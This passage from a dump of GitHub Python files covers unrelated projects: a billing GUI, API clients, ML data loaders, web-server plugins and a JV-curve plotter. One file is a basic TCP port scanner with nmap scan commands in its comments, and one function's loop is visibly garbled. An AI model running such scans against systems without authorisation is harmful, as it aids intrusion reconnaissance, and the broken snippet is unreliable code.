# rename columns/create new columns\r\n df_m = df_m.rename(columns={'Dollars': 'Cost/Hours','Comment':'Vendor/Employee'})\r\n df_m['Cost/Hours'] = pd.to_numeric(df_m['Cost/Hours'],errors='coerce')\r\n df_m['Billable'] = \"\"\r\n df_m['Billable'] = pd.to_numeric(df_m['Billable'],errors='coerce')\r\n\r\n df_mc = pd.merge(df_m,df_c, how = 'left')\r\n \r\n #column schema\r\n df_mc = df_mc[['Job No','Job Description','Cost Code','Cost Code Description','Date','Class','Cost/Hours','Rate','Billable','Vendor/Employee']]\r\n\r\n # multiply data\r\n 
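# (pandas multiplies the 'Rate' and 'Cost/Hours' columns element-wise)\r\n    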
df_mc['Billable']=df_mc['Rate']*df_mc['Cost/Hours']\r\n\r\n outname = 'MATERIALS.csv'\r\n\r\n fullname = os.path.join(outdir, outname)\r\n\r\n df_mc.to_csv(fullname, index=False)\r\n\r\n # Append the two and make a Master file\r\n compiled = df_lp.append(df_mc)\r\n\r\n # 'notes' no longer needed\r\n compiled = compiled.drop(columns = ['notes'])\r\n\r\n compiled = compiled[['Job No','Job Description','Cost Code','Cost Code Description','Date','Class','Cost/Hours','Rate','Billable','Vendor/Employee']]\r\n\r\n outname = TodaysDate +\" MASTER Billing\"+\".xlsx\"\r\n sheetname = \" MasterSheet.csv\"\r\n\r\n fullname = os.path.join(outdir, outname)\r\n sheethand = os.path.join(outdir, sheetname)\r\n\r\n\r\n compiled.to_excel(fullname, sheet_name='Billing', index=False)\r\n compiled.to_csv(sheethand, index=False)\r\n\r\n print('New folder and spreadsheets generated!')\r\n\r\n\r\ndef exitApplication():\r\n MsgBox = tk.messagebox.askquestion ('Exit Application','Are you sure you want to exit the application',icon = 'warning')\r\n if MsgBox == 'yes':\r\n root.destroy()\r\n\r\n\r\nroot= tk.Tk()\r\nroot.title('Billing Application')\r\nroot.geometry('300x600')\r\nroot.configure(bg='lightsteelblue2')\r\n\r\n\r\nlabel1 = tk.Label(root, text='Billing Application', bg = 'lightsteelblue2', anchor='center')\r\nlabel1.config(font=('helvetica', 20))\r\nlabel1.grid(row=0)\r\nbrowseButton_Labor = tk.Button(root, text=\" Import Labor CSV File \", command=getLabor, bg='green', fg='white', font=('helvetica', 12, 'bold'))\r\nbrowseButton_Labor.grid(row=1)\r\n\r\nbrowseButton_Materials = tk.Button(root, text=\" Import Materials CSV File \", command=getMaterials, bg='green', fg='white', font=('helvetica', 12, 'bold'))\r\nbrowseButton_Materials.grid(row=2)\r\n\r\nbrowseButton_Employee = tk.Button(root, text=\" Import Pay Rates CSV File \", command=getEmployees, bg='green', fg='white', font=('helvetica', 12, 'bold'))\r\nbrowseButton_Employee.grid(row=3)\r\n\r\nbrowseButton_Cost = tk.Button(root, text=\" Import Cost Codes CSV File \", command=getCost, bg='green', fg='white', font=('helvetica', 12, 'bold'))\r\nbrowseButton_Cost.grid(row=4)\r\n\r\ncreateButton = tk.Button (root, text=' Create New Billing Folder ',command=createApplication, bg='blue', fg='white', font=('helvetica', 12, 'bold'))\r\ncreateButton.grid(row=5)\r\n\r\nexitButton = tk.Button (root, text=' Exit Application ',command=exitApplication, bg='brown', fg='white', font=('helvetica', 12, 'bold'))\r\nexitButton.grid(row=6)\r\nroot.mainloop()\r\n","repo_name":"climbjh/E-1-Billing-App","sub_path":"gui1.py","file_name":"gui1.py","file_ext":"py","file_size_in_byte":7434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20135471610","text":"import os\nfrom pathlib import Path\nimport json\nimport asyncio\n\nimport requests\nimport websockets\n\nfrom ..models import Action, ControlFrameType, ControlFrame, DeviceRequest, DeviceResponse, \\\n JobRequest, JobActionRequest, JobResponse, TaskRequest, TaskResponse\n\n\nclass APIClient:\n def __init__(self, hostname, port, version, secure, access_key = None, temporary_directory = None):\n self.hostname = hostname\n self.port = port\n self.version = version\n self.secure = secure\n self.access_key = access_key\n self.temporary_directory = temporary_directory\n\n protocol = 'https' if self.secure else 'http'\n\n self.base_url = f'{protocol}://{self.hostname}:{self.port}/{self.version}'\n\n self.authentication_header = {\n 'x-api-key': access_key\n }\n\n def 
_url_from_path(self, path):\n return f'{self.base_url}/{path}'\n\n def _filename_from_resource_url(self, url, prefix):\n id, filename = url.split('/')[-2:]\n\n return self.temporary_directory / Path(f'{prefix}/{id}/{filename}')\n\n def _path_from_id(self, id, prefix):\n return self.temporary_directory / Path(f'{prefix}/{id}')\n\n def register_device(self, node_type):\n url = self._url_from_path('devices/')\n\n device = DeviceRequest(node_type = node_type)\n\n response = requests.post(url, json = device.dict())\n response.raise_for_status()\n\n return DeviceResponse(**response.json())\n\n def get_device(self, id):\n url = self._url_from_path(f'devices/{id}')\n\n response = requests.get(url)\n response.raise_for_status()\n\n return DeviceResponse(**response.json())\n\n def create_job(self, job):\n url = self._url_from_path('jobs/')\n\n response = requests.post(url, json = job.dict())\n response.raise_for_status()\n\n return JobResponse(**response.json())\n\n def upload_job_scene(self, id, scene_path):\n url = self._url_from_path(f'jobs/{id}/scene')\n\n scene = { 'scene': (scene_path.name, open(scene_path, 'rb')) }\n\n response = requests.post(url, files = scene)\n response.raise_for_status()\n\n return JobResponse(**response.json())\n\n def update_job_state(self, id, action):\n url = self._url_from_path(f'jobs/{id}')\n\n job_action = JobActionRequest(action = action)\n\n response = requests.post(url, json = job_action.dict())\n response.raise_for_status()\n\n return JobResponse(**response.json())\n\n def submit_job(self, job, scene_path):\n job_response = self.create_job(job)\n job_response = self.upload_job_scene(job_response.id, scene_path)\n\n return self.update_job_state(job_response.id, Action.start)\n\n def get_job(self, id):\n url = self._url_from_path(f'jobs/{id}')\n\n response = requests.get(url)\n response.raise_for_status()\n\n return JobResponse(**response.json())\n\n def listen_job(self, id, callback, timeout = 60):\n url = self._url_from_path(f'jobs/{id}/ws').replace('http', 'ws')\n\n async def wakeup():\n while True:\n await asyncio.sleep(1)\n\n async def process_message():\n async with websockets.connect(url, close_timeout = timeout, ping_interval = None) as websocket:\n while True:\n data = await websocket.recv()\n json_data = json.loads(data)\n\n try:\n response = ControlFrame(**json_data)\n except:\n response = JobResponse(**json_data)\n\n if isinstance(response, ControlFrame):\n pong_frame = ControlFrame(type = ControlFrameType.pong)\n await websocket.send(pong_frame.json())\n else:\n callback(response)\n\n loop = asyncio.get_event_loop()\n\n loop.create_task(wakeup())\n loop.run_until_complete(process_message())\n\n def get_task(self, id):\n url = self._url_from_path(f'tasks/{id}')\n\n response = requests.get(url, headers = self.authentication_header)\n response.raise_for_status()\n\n return TaskResponse(**response.json())\n\n def update_task_state(self, task, state):\n url = self._url_from_path(f'tasks/{task.id}')\n\n task = TaskRequest(state = state)\n\n response = requests.post(url, headers = self.authentication_header, json = task.dict())\n response.raise_for_status()\n\n task_response = TaskResponse(**response.json())\n\n return task.state == task_response.state\n\n def download_task_resource(self, task):\n url = task.job.scene_url\n\n response = requests.get(url)\n response.raise_for_status()\n\n filename = self._filename_from_resource_url(url, 'jobs')\n\n os.makedirs(filename.parent, exist_ok = True)\n\n with open(filename, 'wb') as file:\n 
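# stream the downloaded scene bytes into the per-job cache path\n            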
file.write(response.content)\n\n        return filename\n\n    def upload_task_resources(self, task):\n        url = self._url_from_path(f'tasks/{task.id}/images')\n\n        path = self._path_from_id(task.id, 'tasks')\n        filenames = path.glob('*')\n\n        images = [('images', (filename.name, open(filename, 'rb'))) for filename in filenames]\n\n        response = requests.post(url, headers = self.authentication_header, files = images)\n        response.raise_for_status()\n\n        return TaskResponse(**response.json())\n","repo_name":"therenderable/renderable-core","sub_path":"renderable_core/services/api_client.py","file_name":"api_client.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"75047815506","text":"import subprocess\n\nnotepad = r\"C:\\Windows\\System32\\notepad.exe\"\n\nme = r\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\"\n\nfile = r\"C:\\Users\\yokam\\OneDrive\\デスクトップ\\ローカルファイル\\test.txt\"\n\nprograms = [notepad, [me, file]]\nfor v in programs:\n    if isinstance(v, list):\n        subprocess.Popen(v)\n    else:\n        subprocess.Popen(v)\n","repo_name":"yokamoto5742/pythongui","sub_path":"python_app_book/samplecode/list312.py","file_name":"list312.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17932178773","text":"import numpy as np\nimport os\nimport pickle\n\n\ndef load_data_shuffle(cv):\n    train_pos_save = f\"data/data_token/fold_{cv}/train_pos.npy\"\n    train_neg_save = f\"data/data_token/fold_{cv}/train_neg.npy\"\n    train_neu_save = f\"data/data_token/fold_{cv}/train_neu.npy\"\n\n    test_pos_save = f\"data/data_token/fold_{cv}/test_pos.npy\"\n    test_neg_save = f\"data/data_token/fold_{cv}/test_neg.npy\"\n    test_neu_save = f\"data/data_token/fold_{cv}/test_neu.npy\"\n\n    # Load the training data\n    pos_train = np.load(train_pos_save, encoding='bytes', allow_pickle=True)\n    neg_train = np.load(train_neg_save, encoding='bytes', allow_pickle=True)\n    neu_train = np.load(train_neu_save, encoding='bytes', allow_pickle=True)\n\n    y_pos_train = np.array([[1, 0, 0]] * len(pos_train))\n    y_neg_train = np.array([[0, 1, 0]] * len(neg_train))\n    y_neu_train = np.array([[0, 0, 1]] * len(neu_train))\n\n    # load the test data\n    pos_test = np.load(test_pos_save, encoding='bytes', allow_pickle=True)\n    neg_test = np.load(test_neg_save, encoding='bytes', allow_pickle=True)\n    neu_test = np.load(test_neu_save, encoding='bytes', allow_pickle=True)\n\n    y_pos_test = np.array([[1, 0, 0]] * len(pos_test))\n    y_neg_test = np.array([[0, 1, 0]] * len(neg_test))\n    y_neu_test = np.array([[0, 0, 1]] * len(neu_test))\n\n    # Split train and validate set\n    val_len = len(pos_train) // 10\n\n    pos_val = pos_train[:val_len]\n    pos_train = pos_train[val_len:]\n    y_pos_val = y_pos_train[:val_len]\n    y_pos_train = y_pos_train[val_len:]\n\n    neg_val = neg_train[:val_len]\n    neg_train = neg_train[val_len:]\n    y_neg_val = y_neg_train[:val_len]\n    y_neg_train = y_neg_train[val_len:]\n\n    neu_val = neu_train[:val_len]\n    neu_train = neu_train[val_len:]\n    y_neu_val = y_neu_train[:val_len]\n    y_neu_train = y_neu_train[val_len:]\n\n    X_train = np.concatenate([pos_train, neu_train, neg_train])\n    y_train = np.concatenate([y_pos_train, y_neu_train, y_neg_train])\n\n    X_val = np.concatenate([pos_val, neu_val, neg_val])\n    y_val = np.concatenate([y_pos_val, y_neu_val, y_neg_val])\n\n    X_test = np.concatenate([pos_test, neu_test, neg_test])\n    y_test = np.concatenate([y_pos_test, y_neu_test, 
y_neg_test])\n\n    # print(f\"X_train: {X_train}\")\n    # print(f\"y_train: {y_train}\")\n    # print(f\"X_val: {X_val}\")\n    # print(f\"y_val: {y_val}\")\n    # print(f\"X_test: {X_test}\")\n    # print(f\"y_test: {y_test}\")\n\n    return X_train, y_train, X_test, y_test, X_val, y_val\n","repo_name":"dzungdducws/Vietnamese-sentiment-analysis","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38388124920","text":"import re\nfrom utils.constants import CHARACTERS\n\n\nclass dotdict(dict):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(dotdict, self).__init__(*args, **kwargs)\n\t\tself.__dict__ = self\n\t\t# recursively convert all dicts to dotdicts\n\t\tfor key, value in self.items():\n\t\t\tif isinstance(value, dict):\n\t\t\t\tself[key] = dotdict(value)\n\t\t\telif isinstance(value, list):\n\t\t\t\tself[key] = [dotdict(v) if isinstance(v, dict) else v for v in value]\n\t\treturn\n\n\tdef __getattr__(self, name):\n\t\treturn self[name]\n\n\ndef format_multiple_choice(choices: list):\n    choices_w_prefix = [f\"({CHARACTERS[i]}) {choice}\" for i, choice in enumerate(choices)]\n    return \"\\n\".join(choices_w_prefix).strip()\n\n\ndef find_sub_list(sublist, l):\n    sll=len(sublist)\n    for ind in (i for i,e in enumerate(l) if e==sublist[0]):\n        if l[ind:ind+sll]==sublist:\n            return ind, ind + sll -1\n\t\ndef findall(p:str, s:str):\n    '''Yields all the positions of\n    the pattern p in the string s.'''\n    i = s.find(p)\n    while i != -1:\n        yield i\n        i = s.find(p, i+1)\n\n\ndef extract_all_numbers(text:str):\n    text = text.replace(',', '').replace('$', '').replace('%', '')\n    return re.findall(r'-?\\d*\\.?\\d+', text)\n\n\nclass bcolors:\n    HEADER = '\\033[95m'\n    OKBLUE = '\\033[94m'\n    OKCYAN = '\\033[96m'\n    OKGREEN = '\\033[92m'\n    WARNING = '\\033[93m'\n    FAIL = '\\033[91m'\n    ENDC = '\\033[0m'\n    BOLD = '\\033[1m'\n    UNDERLINE = '\\033[4m'\n    \ndef print_red(*strs):\n    s = ' '.join([str(s) for s in strs])\n    print(bcolors.WARNING + s + bcolors.ENDC)\n    \ndef print_blue(*strs):\n\ts = ' '.join([str(s) for s in strs])\n\tprint(bcolors.OKBLUE + s + bcolors.ENDC)\n\ndef print_green(*strs):\n\ts = ' '.join([str(s) for s in strs])\n\tprint(bcolors.OKGREEN + s + bcolors.ENDC)","repo_name":"jasonyux/TriPosT","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"28621512393","text":"\"\"\"add email column to business table\n\nRevision ID: 2890f1930a2e\nRevises: \nCreate Date: 2020-06-11 13:06:47.666213\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects.mysql import *\n\n\n# revision identifiers, used by Alembic.\nrevision = '2890f1930a2e'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    op.add_column(\n        'business',\n        sa.Column(\n            'email',\n            VARCHAR(255),\n        )\n    )\n\n\ndef downgrade():\n    op.drop_column(\n        'business',\n        'email',\n    )\n","repo_name":"YangoAngus/yelp","sub_path":"yelp_scrapy_container/alembic/versions/2890f1930a2e_add_email_column_to_business_table.py","file_name":"2890f1930a2e_add_email_column_to_business_table.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24700741","text":"import socket\n\n# UDP: VoIP, video streaming, ...\n# open port <- UDP 
scanner\n# open port -> UDP response scanner\n\n# close port <- UDP scanner\n# close port -> ICMP 3 error scanner\n# $ sudo nmap -v -sU localhost\n\n# SYN (stealth), less noisy because of type of TCP request (not complete request)\n# open port <- SYN scanner\n# open port -> SYN / ACK scanner\n# open port <- RST scanner\n\n# close port <- SYN scanner\n# close port -> RST scanner\n\n# $ sudo nmap -v -sS localhost\n\n#python3 pscan_TCP.py\n# TCP (noisy), easy to detect\n\n# ack = open\n# open port <- syn scanner\n# open port -> syn / ack scanner\n# open port <- ack scanner\n\n# reset = closed\n# close port <- syn scanner\n# close port -> rst scanner\n\n# $ sudo nmap -v -sT localhost\n\n# comprehensive\n# $ sudo nmap -v -sC localhost\n\nIP = \"google.com\"\n\nip = input(\"Enter HOST or IP to scan: \")\nports = []\nportsNumber = int(input(\"Enter how many ports to scan: \"))\n# implement range\n\ncount = 0\n\nwhile count < portsNumber:\n    ports.append(int(input(\"Enter PORT to scan: \")))\n    count += 1\n\nfor port in ports:\n    # IPV4 , TCP/IP\n    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    client.settimeout(0.05)\n    # receives code of TCP transaction\n    code = client.connect_ex((ip, port))\n\n    # https://gist.github.com/gabrielfalcao/4216897\n\n    if code == 0:\n        print(\"Open port -> \", str(code))\n    else:\n        print(\"Closed port -> \" + str(code))\n\nprint (\"End scan\")\n","repo_name":"maxdevjs/learn-dio-port-scanner","sub_path":"pscan_TCP.py","file_name":"pscan_TCP.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"16556606782","text":"import numpy as np\nfrom model.layers import Embedding, Sigmoid, Softmax, Linear, sigmoid, BCELossWithSigmoid\nfrom preprocess import *\nimport pickle\n\nclass HS_skipgram:\n    def __init__(self, vocab_size, projection, lr):\n        self.Embedding = Embedding(vocab_size, projection)\n        self.HSvector = Embedding(vocab_size - 1 , projection)\n        self.lr = lr\n        self.layers = [self.Embedding, self.HSvector]\n\n        self.params = []\n        self.grads = []\n\n        for layer in self.layers:\n            self.params.extend(layer.params)\n            self.grads.extend(layer.grads)\n\n    def forward(self, x, idx_path):\n        '''\n        inputs : 1 x D(projection)\n        label : 1 x [direction_path(1, depth), idx_path(1, depth)]\n        '''\n\n        self.x = x\n        \n        self.hidden = self.Embedding.forward(self.x)\n\n        self.hirearchy_vectors = self.HSvector.forward(idx_path)\n\n        #out = np.sum(self.hirearchy_vectors * self.hidden, axis = 1, keepdims= True)\n        out = np.matmul(self.hirearchy_vectors, self.hidden.T)\n\n        return out\n\n    def backward(self, dout):\n\n        #truth length x hidden\n        d_lin = np.matmul(dout , self.hidden)\n        #d_h = np.matmul(dout.T, self.hirearchy_vectors)\n        #d_h = np.sum(dout * self.hirearchy_vectors, axis = 0)\n        d_h = np.matmul(dout.T,self.hirearchy_vectors)\n\n        self.HSvector.backward(d_lin, self.lr)\n        self.Embedding.backward(d_h, self.lr)\n\n        '''\n        print((self.grads[0] == self.Embedding.grads[0]).all())\n        print((self.grads[1] == self.HSvector.grads[0]).all())\n        '''\n    def save(self, path):\n        with open(path, 'wb') as f:\n            pickle.dump(self.params, f, pickle.HIGHEST_PROTOCOL)\n\n\n    def load(self, path):\n        # load from the given path (the original ignored 'path' and always read \"./bestmodel.pickle\")\n        with open(path, 'rb') as f:\n            x = pickle.load(f)\n\n        self.params = x\n        for param,layer in zip(self.params, self.layers):\n            layer.params = [param]\n\n    def query(self, word, word2idx, idx2word, top = 5):\n\n        if word not in word2idx:\n            print(\"%s does not exist in the corpus\" % word)\n            return\n        \n        W_in , _ = 
self.params\n\n        query_id = word2idx[word]\n        query_vec = W_in[query_id]\n        query_vec = np.expand_dims(query_vec,0)\n\n        # sort in ascending order of similarity\n        similarity = cosine_similarity(W_in , query_vec)\n\n        # take the top entries (the word itself included)\n        result = similarity.argsort(axis = 0)[-top:]\n\n        print(word)\n\n        for i in range(top):\n            print(idx2word[int(result[i])] , similarity[int(result[i])])\n","repo_name":"JunhoKim94/Word2Vec_Study","sub_path":"model/HS_model.py","file_name":"HS_model.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"}
{"seq_id":"15477012999","text":"'''\nlog(2) is too slow,\nso use log(10) instead\n'''\ndef superPow_(a , b) :\n    def divide2(b) :\n        # NOTE: the loop body was garbled by tag stripping in the source; it is\n        # reconstructed here under the assumption that b is a big-endian list of\n        # decimal digits and divide2 halves that number\n        n = len(b)\n        for i in range(n) :\n            if b[i]%2 == 1 and i < n-1 :\n                b[i+1] += 10\n            b[i] = b[i]//2\n        while b[0] == 0 and len(b) > 1 :\n            b = b[1:]\n        return b\n    ret = 1\n    while b!=[0] :\n        if b[-1]%2 == 1 :\n            ret = ret*a % 1337\n        a = a*a%1337\n        b = divide2(b)\n    return ret\ndef superPow( a, b):\n    if not b:\n        return 1\n    return pow(a, b.pop(), 1337)*superPow(pow(a, 10, 1337), b)%1337\nif __name__ == '__main__' :\n    print(superPow(3,[4]))","repo_name":"severinzhong/practice","sub_path":"leetcode/372.py","file_name":"372.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"26525536962","text":"#!/usr/bin/python\nfrom Foundation import *\nfrom AppKit import *\nimport time\nimport os\nimport os.path\n\ndef acornProxy():\n    port = \"com.flyingmeat.Acorn4.JSTalk\"\n    \n    conn = None\n    tries = 0\n    \n    while ((conn is None) and (tries < 10)):\n        conn = NSConnection.connectionWithRegisteredName_host_(port, None)\n        tries = tries + 1;\n        \n        if (not conn):\n            print(\"Waiting for Acorn to launch\");\n            time.sleep(1)\n    \n    if (not conn):\n        print(\"Could not find a JSTalk connection\")\n        return None\n    \n    return conn.rootProxy()\n    \n    \n# Grab the Acorn DO\nacorn = acornProxy();\n\n\nacorn.setPreference_forKey_(\".5\", \"jpegCompression\");\n\nfor f in os.listdir(\"Originals\"):\n    path = os.path.abspath(\"Originals/\" + f)\n    print(path)\n    doc = acorn.open_(path);\n    doc.flipCanvasWithDirection_(\"horizontal\");\n    doc.saveDocument_(None)\n    doc.close()\n    \n    # this is equally valid:\n    # newDoc.dataOfType(\"public.png\").writeToFile(\"/tmp/foo.png\") \n    ","repo_name":"ccgus/AcornSDK","sub_path":"python/Flip.py","file_name":"Flip.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"48"}
{"seq_id":"25081959282","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom modules.BigM.routers import BigM_routes\n\n# Init the fastAPI app\napp = FastAPI()\n\n# registering the modules routers\napp.include_router(BigM_routes.router)\n\n# Configuring CORSMiddleware\norigins = [\n    \"http://localhost:3000\",\n    \"localhost:3000\"\n]\n\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=origins,\n    allow_credentials=True,\n    allow_methods=[\"*\"],\n    allow_headers=[\"*\"]\n)","repo_name":"Capital2/Big-M","sub_path":"backend/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"}
{"seq_id":"23820276585","text":"\"\"\"\nModule that decides where to route the file\nand handles compressing and decompressing it\nusing the required algorithm\n\"\"\"\n\nfrom image_data import work_with_image\nfrom video_data import work_with_video\nfrom audio_data import work_with_audio\nfrom txt_data import 
work_with_txt\n\ndef compress(path: str, algorithm: str):\n    \"\"\"\n    Args:\n    - path: str, the path/name of the file with extension\n    - algorithm: str, name of the required algorithm\n    Return:\n    - (path, statistics): the file path and the compression statistics,\n      or (None, None) if the file type is not supported\n    \"\"\"\n    file_type = path.split('.')[-1]\n\n    # TEXT\n    if file_type == 'txt':\n        statistics = work_with_txt(path, algorithm)\n    # PICTURE\n    elif file_type in ['jpg', 'png', 'jpeg']:\n        statistics = work_with_image(path, algorithm)\n    # VIDEO\n    elif file_type == 'mp4':\n        statistics = work_with_video(path, algorithm)\n    # AUDIO\n    elif file_type in ['mp3', 'wav', 'flac']:\n        statistics = work_with_audio(path, algorithm)\n    else:\n        print('File type not supported')\n        return None, None\n    return path, statistics\n","repo_name":"loginyuk/computer_project_2","sub_path":"compressor.py","file_name":"compressor.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"38132838682","text":"import nonebot\nimport requests\nfrom quart import request\nfrom jinja2 import PackageLoader,Environment\nfrom .main import login\n\nbot = nonebot.get_bot() # must already be initialized before this point\n\nenv = Environment(loader=PackageLoader('webserver','templates'))\n\n# Hot-reload endpoint: send a POST request here to restart\n@bot.server_app.route('/update', methods=['POST'])\nasync def update():\n    try:\n        return 'OK'\n    finally:\n        requests.post(\"http://127.0.0.1:94/update\") # post to a small service on local port 94\n\n\n@bot.server_app.route('/send', methods=['POST'])\nasync def send():\n    try:\n        user = (await request.form).get('who')\n        text = (await request.form).get('what')\n        await bot.send_private_msg(user_id=user, message=text)\n        return \"ok\"\n    except:\n        return \"error\"\n\n\n","repo_name":"chnnnnng/nonebot-bai","sub_path":"bai/plugins/webserver/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"8650562274","text":"import json\nimport sys\nimport uuid\n\nfrom elasticsearch import Elasticsearch\n\ndef main(file_name):\n    es = Elasticsearch()\n\n    with open(file_name) as f:\n        for i, line in enumerate(f):\n            paper = json.loads(line)\n            es.index(\n                index='papers',\n                doc_type='paper',\n                id=uuid.uuid4(),\n                body=paper\n            )\n            if not i%1000:\n                print(\n                    f'{i} docs indexed.',\n                    end='\\r'\n                )\n\nif __name__ == \"__main__\":\n    main(sys.argv[1])\n","repo_name":"fmanen/OpenCSMap","sub_path":"elasticsearch/data/index_es.py","file_name":"index_es.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"17698033102","text":"import pickle\nimport sys\nfrom experiment_suite.scheduler import sweep as sweep_lib\n\nif __name__ == '__main__':\n    temp_name = sys.argv[1]\n    sweep_file = f'/tmp/sweep_{temp_name}.py'\n    machine_file = f'/tmp/machines_{temp_name}'\n    run_file_path = sweep_lib.build_run_file_from_sweep_file(sweep_file, machine_file)\n    out = {'experiment_data_dir': run_file_path}\n    print(pickle.dumps(out, 0).decode())","repo_name":"chrisgrimm/scheduler","sub_path":"experiment_suite/scheduler/remote_executables/sweep_file_to_run_file.py","file_name":"sweep_file_to_run_file.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"27231575882","text":"from rtctools_heat_network.pycml import Connector, Variable\n\nfrom .._internal.electricity_component import 
ElectricityComponent\n\n\nclass ElectricityPort(ElectricityComponent, Connector):\n \"\"\"\n The electricity port is used to model the variables at a port where two assets are connected.\n For electricity networks we model the electrical power (P), the voltage (V) and the current (I).\n \"\"\"\n\n def __init__(self, name, **modifiers):\n super().__init__(name, **modifiers)\n\n self.add_variable(Variable, \"Power\")\n self.add_variable(Variable, \"V\", min=0.0)\n self.add_variable(Variable, \"I\")\n\n\nclass ElectricityTwoPort(ElectricityComponent):\n \"\"\"\n For electricity components that transport power we have a two port component to allow for\n electricity flow in and out of the component.\n \"\"\"\n\n def __init__(self, name, **modifiers):\n super().__init__(name, **modifiers)\n\n self.add_variable(ElectricityPort, \"ElectricityIn\")\n self.add_variable(ElectricityPort, \"ElectricityOut\")\n","repo_name":"Nieuwe-Warmte-Nu/rtc-tools-heat-network","sub_path":"src/rtctools_heat_network/pycml/component_library/heat/electricity/electricity_base.py","file_name":"electricity_base.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70037331346","text":"import os\nimport tkinter as tk\nfrom collections import defaultdict\nfrom tkinter import messagebox, filedialog\n\nimport customtkinter as ctk\n\nfrom JV_plotter_GUI.Potentostats_check import PotentiostatFileChecker\nfrom JV_plotter_GUI.Plotter import DevicePlotter\nfrom JV_plotter_GUI.Slide_frame import SettingsPanel\nfrom JV_plotter_GUI.The_lower_frames import LowestFrame, ProceedFrame\nfrom JV_plotter_GUI.TimeLine_detector import TimeLineProcessor\nfrom JV_plotter_GUI.Top_frame import TopmostFrame\nfrom JV_plotter_GUI.Treeviews_frame import TableFrames\nfrom JV_plotter_GUI.settings import settings\nfrom JV_plotter_GUI.Additional_settings_panel import AdditionalSettings\nfrom JV_plotter_GUI.instruments import sort_inner_keys\n\n\nclass IVProcessingMainClass(ctk.CTkFrame):\n def __init__(self, parent, *args, **kwargs):\n super().__init__(master=parent, *args, **kwargs)\n\n # Some variables\n self.parent = parent\n self.table_size = settings['Main frame']['table_size']\n self.potentiostat = 'All'\n self.file_directory = \"\"\n self.timeline_df = None\n self.files_selected = []\n self.added_iv = defaultdict(dict)\n self.aging_mode = False\n self.iaa = True\n self.open_wb = True\n self.color_wb = True\n self.dump_json = False\n\n # widgets\n self.pack(fill=ctk.BOTH, expand=True)\n self.table_frame = TableFrames(parent=self, height=400)\n self.additional_settings = AdditionalSettings(parent=self, start_pos=-0.25, end_pos=0)\n self.slide_frame = SettingsPanel(parent=self, start_pos=1.0, end_pos=0.75)\n self.label_1 = ctk.CTkLabel(self, text='Specify a directory with images to work with')\n self.label_1.pack()\n\n self.ask_directory_button = ctk.CTkButton(self, text='Choose a directory', command=lambda: self.ask_directory())\n self.ask_directory_button.pack()\n\n self.topmost_frame = TopmostFrame(parent=self, width=350, height=70, fg_color='transparent')\n self.topmost_frame.pack()\n\n self.table_frame.pack(pady=10)\n\n self.frame = ProceedFrame(parent=self, width=200, height=200)\n self.frame.pack(pady=10)\n\n self.lowest_frame = LowestFrame(self, fg_color='transparent')\n self.lowest_frame.pack(fill='x')\n\n def aging_mode_activator(self) -> None:\n \"\"\"\n Activate the \"Aging mode\"\n :return: None\n \"\"\"\n self.aging_mode = 
bool(self.slide_frame.aging_mode_checkbox.get())\n        self.slide_frame.timeline_detector_button.configure(\n            state='normal' if self.slide_frame.aging_mode_checkbox.get() else 'disabled')\n        self.frame.button_selected.configure(\n            state='disabled' if self.slide_frame.aging_mode_checkbox.get() else 'normal')\n        self.list_files()\n\n    def identical_active_areas_activator(self) -> None:\n        \"\"\"\n        Apply the same active areas for all devices\n        :return: None\n        \"\"\"\n        self.iaa = bool(self.slide_frame.identical_areas_CheckBox.get())\n\n    def open_wb_activator(self) -> None:\n        \"\"\"\n        Open workbook at the end of the code\n        :return: None\n        \"\"\"\n        self.open_wb = bool(self.additional_settings.open_wb_checkbox.get())\n\n    def color_wb_activator(self) -> None:\n        \"\"\"\n        Color the workbook at the end of the code\n        :return: None\n        \"\"\"\n        self.color_wb = bool(self.additional_settings.color_wb_checkbox.get())\n\n    def 